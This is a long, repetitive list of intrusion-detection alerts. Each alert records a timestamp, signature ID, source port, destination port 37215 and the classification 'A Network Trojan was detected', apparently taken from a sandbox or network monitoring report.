                Timestamp:05/29/24-15:15:24.685798
                SID:2835222
                Source Port:37608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721636
                SID:2829579
                Source Port:58802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951072
                SID:2835222
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101657
                SID:2829579
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422363
                SID:2835222
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421923
                SID:2829579
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168676
                SID:2829579
                Source Port:44234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271712
                SID:2829579
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521631
                SID:2835222
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161019
                SID:2835222
                Source Port:41144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417651
                SID:2835222
                Source Port:51666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334846
                SID:2835222
                Source Port:60886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506378
                SID:2829579
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087254
                SID:2829579
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730654
                SID:2835222
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588770
                SID:2835222
                Source Port:41952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268499
                SID:2829579
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783532
                SID:2835222
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384981
                SID:2829579
                Source Port:41820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038074
                SID:2835222
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384974
                SID:2835222
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559396
                SID:2829579
                Source Port:34636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208039
                SID:2829579
                Source Port:48228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279231
                SID:2835222
                Source Port:36716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644711
                SID:2835222
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276495
                SID:2829579
                Source Port:39884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418297
                SID:2829579
                Source Port:57426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807445
                SID:2835222
                Source Port:35922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979691
                SID:2835222
                Source Port:36218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584440
                SID:2829579
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927672
                SID:2835222
                Source Port:53988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789129
                SID:2835222
                Source Port:33318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556141
                SID:2835222
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162276
                SID:2835222
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136238
                SID:2835222
                Source Port:44256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394755
                SID:2835222
                Source Port:57556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264683
                SID:2835222
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896425
                SID:2835222
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899063
                SID:2835222
                Source Port:58348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264807
                SID:2835222
                Source Port:38444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730549
                SID:2835222
                Source Port:51114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434265
                SID:2829579
                Source Port:57384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508508
                SID:2835222
                Source Port:53486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518915
                SID:2835222
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228422
                SID:2835222
                Source Port:46402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385457
                SID:2835222
                Source Port:37608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449793
                SID:2829579
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287119
                SID:2829579
                Source Port:54810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782593
                SID:2835222
                Source Port:57836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221705
                SID:2829579
                Source Port:36338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166742
                SID:2829579
                Source Port:33154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786745
                SID:2835222
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640803
                SID:2835222
                Source Port:55922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941557
                SID:2835222
                Source Port:35516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688116
                SID:2829579
                Source Port:37490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794995
                SID:2835222
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136145
                SID:2835222
                Source Port:47212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032631
                SID:2835222
                Source Port:42816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868880
                SID:2829579
                Source Port:41584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763901
                SID:2829579
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048590
                SID:2835222
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887676
                SID:2835222
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417683
                SID:2835222
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945261
                SID:2835222
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737155
                SID:2835222
                Source Port:57900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731100
                SID:2829579
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899558
                SID:2835222
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028066
                SID:2835222
                Source Port:49970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946325
                SID:2829579
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463450
                SID:2835222
                Source Port:53752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511017
                SID:2829579
                Source Port:44560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618867
                SID:2835222
                Source Port:45898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878097
                SID:2829579
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436602
                SID:2835222
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556933
                SID:2835222
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992912
                SID:2829579
                Source Port:50148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165470
                SID:2829579
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781779
                SID:2829579
                Source Port:54816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088406
                SID:2835222
                Source Port:39076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804834
                SID:2835222
                Source Port:57888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325473
                SID:2835222
                Source Port:34626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502058
                SID:2835222
                Source Port:55088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613171
                SID:2835222
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281443
                SID:2829579
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652858
                SID:2835222
                Source Port:59314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730798
                SID:2829579
                Source Port:35936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440641
                SID:2835222
                Source Port:46220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329295
                SID:2835222
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384243
                SID:2835222
                Source Port:55864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023844
                SID:2835222
                Source Port:46968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987280
                SID:2835222
                Source Port:48690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074042
                SID:2829579
                Source Port:36742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287778
                SID:2829579
                Source Port:32892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226617
                SID:2829579
                Source Port:33968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944702
                SID:2835222
                Source Port:43742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446370
                SID:2835222
                Source Port:57114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617595
                SID:2835222
                Source Port:50442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374483
                SID:2835222
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583806
                SID:2829579
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169053
                SID:2829579
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278119
                SID:2829579
                Source Port:34836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933098
                SID:2835222
                Source Port:40992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290384
                SID:2829579
                Source Port:53758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521260
                SID:2835222
                Source Port:50754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271188
                SID:2829579
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239528
                SID:2829579
                Source Port:59868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997231
                SID:2835222
                Source Port:35070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335362
                SID:2829579
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437096
                SID:2829579
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561940
                SID:2835222
                Source Port:46816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687929
                SID:2835222
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179624
                SID:2829579
                Source Port:48232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165215
                SID:2829579
                Source Port:52144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110737
                SID:2829579
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899696
                SID:2835222
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462977
                SID:2829579
                Source Port:38954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957465
                SID:2829579
                Source Port:46650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968314
                SID:2829579
                Source Port:39090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573321
                SID:2835222
                Source Port:37598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624830
                SID:2829579
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763451
                SID:2835222
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022594
                SID:2835222
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786257
                SID:2835222
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622025
                SID:2829579
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286639
                SID:2829579
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722034
                SID:2835222
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767442
                SID:2835222
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778383
                SID:2829579
                Source Port:43500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525567
                SID:2835222
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100176
                SID:2835222
                Source Port:40308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782843
                SID:2835222
                Source Port:40826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985587
                SID:2829579
                Source Port:60936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263591
                SID:2829579
                Source Port:40554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556780
                SID:2835222
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265871
                SID:2829579
                Source Port:33892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331174
                SID:2835222
                Source Port:50626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440663
                SID:2835222
                Source Port:56004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438642
                SID:2835222
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176705
                SID:2835222
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818222
                SID:2835222
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665214
                SID:2829579
                Source Port:54354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967539
                SID:2829579
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363259
                SID:2835222
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070245
                SID:2835222
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.156073
                SID:2829579
                Source Port:49846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684427
                SID:2829579
                Source Port:53802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957589
                SID:2835222
                Source Port:58682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612922
                SID:2829579
                Source Port:38366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558257
                SID:2835222
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819131
                SID:2829579
                Source Port:47586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740309
                SID:2829579
                Source Port:48258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380210
                SID:2835222
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175362
                SID:2835222
                Source Port:51290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653304
                SID:2835222
                Source Port:54472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722421
                SID:2835222
                Source Port:53412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037114
                SID:2829579
                Source Port:57358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422119
                SID:2829579
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798599
                SID:2835222
                Source Port:56708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210867
                SID:2835222
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654981
                SID:2829579
                Source Port:54564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500666
                SID:2829579
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538379
                SID:2829579
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963877
                SID:2829579
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509695
                SID:2829579
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739788
                SID:2829579
                Source Port:50220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336064
                SID:2829579
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380828
                SID:2835222
                Source Port:49228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263755
                SID:2835222
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427411
                SID:2829579
                Source Port:57530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445675
                SID:2835222
                Source Port:57818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820982
                SID:2835222
                Source Port:59088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537135
                SID:2829579
                Source Port:58988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275885
                SID:2829579
                Source Port:49854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593605
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873457
                SID:2829579
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363464
                SID:2829579
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287996
                SID:2829579
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869476
                SID:2829579
                Source Port:51350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787598
                SID:2829579
                Source Port:45178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986223
                SID:2829579
                Source Port:37918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071379
                SID:2829579
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325329
                SID:2835222
                Source Port:60740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.476452
                SID:2829579
                Source Port:57786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166529
                SID:2829579
                Source Port:54894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326081
                SID:2835222
                Source Port:39428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421536
                SID:2829579
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655924
                SID:2829579
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873239
                SID:2835222
                Source Port:34670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899629
                SID:2829579
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208163
                SID:2829579
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567752
                SID:2835222
                Source Port:37222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162361
                SID:2835222
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180167
                SID:2835222
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660921
                SID:2829579
                Source Port:46530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280998
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779795
                SID:2829579
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022915
                SID:2835222
                Source Port:46804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656028
